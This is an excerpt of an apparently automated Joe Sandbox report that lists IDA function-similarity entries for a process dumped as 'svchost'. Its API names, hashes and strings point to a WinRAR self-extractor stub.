                                      Similarity
                                      • API ID: HeapProcess
                                      • String ID:
                                      • API String ID: 54951025-0
                                      • Opcode ID: 8ef6bd8a1415cb7c5da5da35a15a7e13ba77f4b6edacbf61990d264b926fc8c2
                                      • Instruction ID: 5a541bdced0b725a50569beee6e7fb406f9339a2e8698775f2bcf9458f9f5853
                                      • Opcode Fuzzy Hash: 8ef6bd8a1415cb7c5da5da35a15a7e13ba77f4b6edacbf61990d264b926fc8c2
                                      • Instruction Fuzzy Hash: C1B09220E07B46C2EB492F596C8265422F4BF4CB10F990038C81C94320DE3C20E56701
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
                                      • Instruction ID: 21740b6e3e1032ca491645764e876a88a8947f7d5bdb2c71b51fe22b0cdb7488
                                      • Opcode Fuzzy Hash: 6a4fac86f8f1a6b9d8c17b4c2881c5c96027003405599c7815143c772f625e0d
                                      • Instruction Fuzzy Hash: 12F0B2A1A1C00AD2FB6C5828981A33920F6AB52314F64887BED1ACE2C9DC9DB9919109
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$Xinvalid_argumentstd::_
                                      • String ID: DXGIDebug.dll$UNC$\$\$\\?\
                                      • API String ID: 4097890229-2826201243
                                      • Opcode ID: 4478dfd7ebda127dd6d45acd1d8672479a12dc3f843589c1fec9a3a33b3a8959
                                      • Instruction ID: cfc8d6bccd74f3fcac6d49b0600854320666220551d54f0dd6be6cb60513ab4a
                                      • Opcode Fuzzy Hash: 4478dfd7ebda127dd6d45acd1d8672479a12dc3f843589c1fec9a3a33b3a8959
                                      • Instruction Fuzzy Hash: 2E129122A09B8AC1EB109F65E0401BDB7B1EB85B94F505231EE5D9BBE9DF7CE584C340
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn$Global$AllocCreateStream
                                      • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                      • API String ID: 2868844859-1533471033
                                      • Opcode ID: 89809a7b50bc6049c64b6db06e6ca983a36b379378358c442292962ae0a9aa9f
                                      • Instruction ID: 5d0b8c2597b2eb0716c9a24ca1cbf2f6206dd924c25f2bc33f2f9e6e3508bc59
                                      • Opcode Fuzzy Hash: 89809a7b50bc6049c64b6db06e6ca983a36b379378358c442292962ae0a9aa9f
                                      • Instruction Fuzzy Hash: 38817C62F18A46D5FB00DFA5D4402FD33B1AB48798F404636DE1DAE79AEE38E54AC344
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo
                                      • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                      • API String ID: 3215553584-2617248754
                                      • Opcode ID: 129f0f23fb98aa196cf11125cf189078a62f1fcea35804d155ad867a369635b6
                                      • Instruction ID: bbadeeea0a8c1066eefda16cf57d656cbe55f17fba783f82d2ee80fa963516c4
                                      • Opcode Fuzzy Hash: 129f0f23fb98aa196cf11125cf189078a62f1fcea35804d155ad867a369635b6
                                      • Instruction Fuzzy Hash: 33418A32A09B85C9EB04CF25E8417AE37F4EB18398F005536EE5C8BB94DE38D029C740
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Window$MessageObjectSend$ClassDeleteLongName
                                      • String ID: STATIC
                                      • API String ID: 2845197485-1882779555
                                      • Opcode ID: 4dd6d5dc918661da1f3624fd6136043f65082c3b4d04d17e028a08c7ae34189a
                                      • Instruction ID: 7eeac2642c35e75ae9e9af109067db5b430dccac3f65411c8fba28b1915617c5
                                      • Opcode Fuzzy Hash: 4dd6d5dc918661da1f3624fd6136043f65082c3b4d04d17e028a08c7ae34189a
                                      • Instruction Fuzzy Hash: FC317C25A08646C6EB659F12A5157BA23F1FF89BD0F504430DE4E8FB55EE3CE8068B40
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ItemTextWindow
                                      • String ID: LICENSEDLG
                                      • API String ID: 2478532303-2177901306
                                      • Opcode ID: 082efc828564f9cbac089f32b7dc64d375ba9598fdabf3838a5d706b83ee7c6d
                                      • Instruction ID: 86b7424283cdb4c609a6f52d120b502c476a782d045c880058bbdfed0723bb57
                                      • Opcode Fuzzy Hash: 082efc828564f9cbac089f32b7dc64d375ba9598fdabf3838a5d706b83ee7c6d
                                      • Instruction Fuzzy Hash: 0F416831A18A56C2FB548F11A94877932B2BB8AB94F544135DE0D8FBA4CF3DA9468740
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: AddressProc$CurrentDirectoryProcessSystem
                                      • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                      • API String ID: 2915667086-2207617598
                                      • Opcode ID: 63d2197320245242f8b0de3d330f8e78444bfd864ace6ce5733bd314b656da32
                                      • Instruction ID: a5113952c2688ddf32e4bdbad98e8a7567c40f0b615250762db609cb4bc8c319
                                      • Opcode Fuzzy Hash: 63d2197320245242f8b0de3d330f8e78444bfd864ace6ce5733bd314b656da32
                                      • Instruction Fuzzy Hash: 0A313624A0DB4BC1FA109F16AA9057A77F0BF89B90F451236CD5E8F7A8DE7CE445A340
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: File$NamedPipe$CreateErrorLastPeekReadWaitWrite
                                      • String ID: \\.\pipe\
                                      • API String ID: 687869086-91387939
                                      • Opcode ID: 775a8035613ed1d19014cf5cf142c3491cf5c4671f54193dbf5003945902ee6f
                                      • Instruction ID: 5c1860526c580b1bca6b1a04799e59d2f0b7b05c715bd08b01c57cd7d2a5dde9
                                      • Opcode Fuzzy Hash: 775a8035613ed1d19014cf5cf142c3491cf5c4671f54193dbf5003945902ee6f
                                      • Instruction Fuzzy Hash: F4411A22618A81D7EB20CF25E4507AAB3B1FB88B58F404135EE4D8AA98CF7CD559CB00
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Is_bad_exception_allowedabortstd::bad_alloc::bad_alloc
                                      • String ID: csm$csm$csm
                                      • API String ID: 2940173790-393685449
                                      • Opcode ID: 3935ea780d766a9afaff3bdc445d07aba12077bcddd6091db91b1da3f6c0d63e
                                      • Instruction ID: 716f5cc09e4bf7adbaa148e9f48221c45f5c70fa0d3ff308482e21e557e667b4
                                      • Opcode Fuzzy Hash: 3935ea780d766a9afaff3bdc445d07aba12077bcddd6091db91b1da3f6c0d63e
                                      • Instruction Fuzzy Hash: 77E18B72A08782CAEB209F25D4853AD7BF0EB55788F144235DE8D8B796DF38E589C740
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                       • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                       • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: AllocClearStringVariant
                                      • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                      • API String ID: 1959693985-3505469590
                                      • Opcode ID: 11e3559986fec1d2ed21cea1281b02686d4db21b248b00765fc5a15c015bbab8
                                      • Instruction ID: 3906bf54d14f7a2d9f5d19e98175f8df018a823f83ca79ba486ff4b7a075be34
                                      • Opcode Fuzzy Hash: 11e3559986fec1d2ed21cea1281b02686d4db21b248b00765fc5a15c015bbab8
                                      • Instruction Fuzzy Hash: 84710936A14B49C6EB10CF69E8905AD77F4FB98B98B455132DE4E8BBA8CF38D444C700
                                      APIs
                                      • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF669AD6423,?,?,?,00007FF669AD40EE,?,?,?,00007FF669AD40A9), ref: 00007FF669AD62A1
                                      • GetLastError.KERNEL32(?,?,00000000,00007FF669AD6423,?,?,?,00007FF669AD40EE,?,?,?,00007FF669AD40A9), ref: 00007FF669AD62AF
                                      • LoadLibraryExW.KERNEL32(?,?,00000000,00007FF669AD6423,?,?,?,00007FF669AD40EE,?,?,?,00007FF669AD40A9), ref: 00007FF669AD62D9
                                      • FreeLibrary.KERNEL32(?,?,00000000,00007FF669AD6423,?,?,?,00007FF669AD40EE,?,?,?,00007FF669AD40A9), ref: 00007FF669AD6347
                                      • GetProcAddress.KERNEL32(?,?,00000000,00007FF669AD6423,?,?,?,00007FF669AD40EE,?,?,?,00007FF669AD40A9), ref: 00007FF669AD6353
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                      • String ID: api-ms-
                                      • API String ID: 2559590344-2084034818
                                      • Opcode ID: 8c967af58753effb9ee27394aad689f6c3124d9316ed138daee22ba4e84c5920
                                      • Instruction ID: 689b43a76e27f6a5701af25f901c70e82f6896bde14387048cca8f627a89aa6b
                                      • Opcode Fuzzy Hash: 8c967af58753effb9ee27394aad689f6c3124d9316ed138daee22ba4e84c5920
                                      • Instruction Fuzzy Hash: 5B31AF21B1AA42D2EE519F06A80057933F4BF59BA0F5A4635DE2E8F790EF3CE4488310
                                      APIs
                                      • GetModuleHandleW.KERNEL32(?,?,?,00007FF669AD0F38,?,?,?,00007FF669AD137D), ref: 00007FF669AD0FF3
                                      • GetProcAddress.KERNEL32(?,?,?,00007FF669AD0F38,?,?,?,00007FF669AD137D), ref: 00007FF669AD1010
                                      • GetProcAddress.KERNEL32(?,?,?,00007FF669AD0F38,?,?,?,00007FF669AD137D), ref: 00007FF669AD102C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: AddressProc$HandleModule
                                      • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                      • API String ID: 667068680-1718035505
                                      • Opcode ID: bef4845c716d6fdf20741acb37857c46c4d833d92e094d65c1bb9acd70036fe8
                                      • Instruction ID: 13bfa9519b51f77df7d1d5faa2b2079f1e34928a9a40484926e842d5f9343efc
                                      • Opcode Fuzzy Hash: bef4845c716d6fdf20741acb37857c46c4d833d92e094d65c1bb9acd70036fe8
                                      • Instruction Fuzzy Hash: 4F112D21A0EB86C5FE69AF10AA4027533F26F09798F491435CD4ECE755EE7DF5889380
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo_noreturn
                                      • String ID: .rar$exe$rar$sfx
                                      • API String ID: 3668304517-630704357
                                      • Opcode ID: a899538301f951457d491095515a351fa1e77726a9d97ad66d6b93861eb248e3
                                      • Instruction ID: 1d66222c371b4fc2e289fcf2385b36a34d7499cd4dd762ac35bd5f3dc7c6d940
                                      • Opcode Fuzzy Hash: a899538301f951457d491095515a351fa1e77726a9d97ad66d6b93861eb248e3
                                      • Instruction Fuzzy Hash: C0A1AA22E08A4AC0EA009F29D4512BC33F1EF41BA8F545231DE1D9B7AADF7CE599C340
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: abort$CallEncodePointerTranslator
                                      • String ID: MOC$RCC
                                      • API String ID: 2889003569-2084237596
                                      • Opcode ID: 107c64c1dd9d1996c43b0727a946b15215050c392489a6b9acfa9adfedc51f6a
                                      • Instruction ID: 8e45496dc253c950acbe546b6c0929e7eef45f4c21ddaf91477106f35f57c3c4
                                      • Opcode Fuzzy Hash: 107c64c1dd9d1996c43b0727a946b15215050c392489a6b9acfa9adfedc51f6a
                                      • Instruction Fuzzy Hash: 17915C72A08791CAE750DF65E8802AD7BF0FB45788F144129EE8D9B799DF38D199C700
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
                                      • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                      • API String ID: 2102711378-639343689
                                      • Opcode ID: 39ae5b0d30208e6beee367f1dce86ef115d593417b4aabbe3785c0a493bca274
                                      • Instruction ID: c32cef99082807164055134b168046025e4e0467b766d65a8d99bb0d6316bd31
                                      • Opcode Fuzzy Hash: 39ae5b0d30208e6beee367f1dce86ef115d593417b4aabbe3785c0a493bca274
                                      • Instruction Fuzzy Hash: B6518B62E18646CAFB00DF65D8816BD33B0AF59794F501235DE1DAAA96DF3CE885C340
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: Window$Show$Rect
                                      • String ID: RarHtmlClassName
                                      • API String ID: 2396740005-1658105358
                                      • Opcode ID: 0429721503f3df6d0e4a2ebf805ed837eaba4dec232275f2850ff57e015bc3eb
                                      • Instruction ID: 9060eba71e0214539352599dad09e68cfdc8f867f13c8c4557e3c411344e312d
                                      • Opcode Fuzzy Hash: 0429721503f3df6d0e4a2ebf805ed837eaba4dec232275f2850ff57e015bc3eb
                                      • Instruction Fuzzy Hash: 50517C66A08786CAEB249F26E55477E77B0FB89B80F044035DE8E8BB55DF3CE0458700
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: RENAMEDLG$REPLACEFILEDLG
                                      • API String ID: 0-56093855
                                      • Opcode ID: 98f483e2fb6a5dd7541989aead46f565bae59da7c077ff2ce5c4d400261fba0d
                                      • Instruction ID: 3020a960ec53b61085492703a2f69fdf0c2943d4b596a706082ee7e076e2cdd0
                                      • Opcode Fuzzy Hash: 98f483e2fb6a5dd7541989aead46f565bae59da7c077ff2ce5c4d400261fba0d
                                      • Instruction Fuzzy Hash: 7C21466590DA8BC0FB508F18A94417A77F5AB4AB88F24043ADD4DCF364CEBCE885D380
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: 4359b773fbba0af720932c525fc46cc875e6aefae9fbcebe7df6f6e6fb7e7f65
                                      • Instruction ID: 8d8309161b9364a484473bdad39fef4b5aa7ce283dde5a49e51e5855fcabf00f
                                      • Opcode Fuzzy Hash: 4359b773fbba0af720932c525fc46cc875e6aefae9fbcebe7df6f6e6fb7e7f65
                                      • Instruction Fuzzy Hash: 0FF03C61A19A82C2EF449F15F48427933B1AF88B90F485035ED4F8A764DE3CD4889710
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1714311592.00007FF669AA1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF669AA0000, based on PE: true
                                      • Associated: 00000003.00000002.1714273660.00007FF669AA0000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714507502.00007FF669AE8000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669AFB000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714602281.00007FF669B04000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000003.00000002.1714715631.00007FF669B0A000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff669aa0000_svchost.jbxd
                                      Similarity
                                      • API ID: _invalid_parameter_noinfo
                                      • String ID:
                                      • API String ID: 3215553584-0
                                      • Opcode ID: 27f67fe41e4c42298b33de1106483450569c9edced6e25817fd9ffe2d7ca504a
                                      • Instruction ID: e9a1c8fb2cc8144f8c77242978aaf8e063f9545dd5faaa23afc53e42447ceebd
                                      • Opcode Fuzzy Hash: 27f67fe41e4c42298b33de1106483450569c9edced6e25817fd9ffe2d7ca504a
                                      • Instruction Fuzzy Hash: BD81ED62E18692D9FB249F6588806BE77F0BB44B88F404135CE8E8B7A5DF3CE405E710
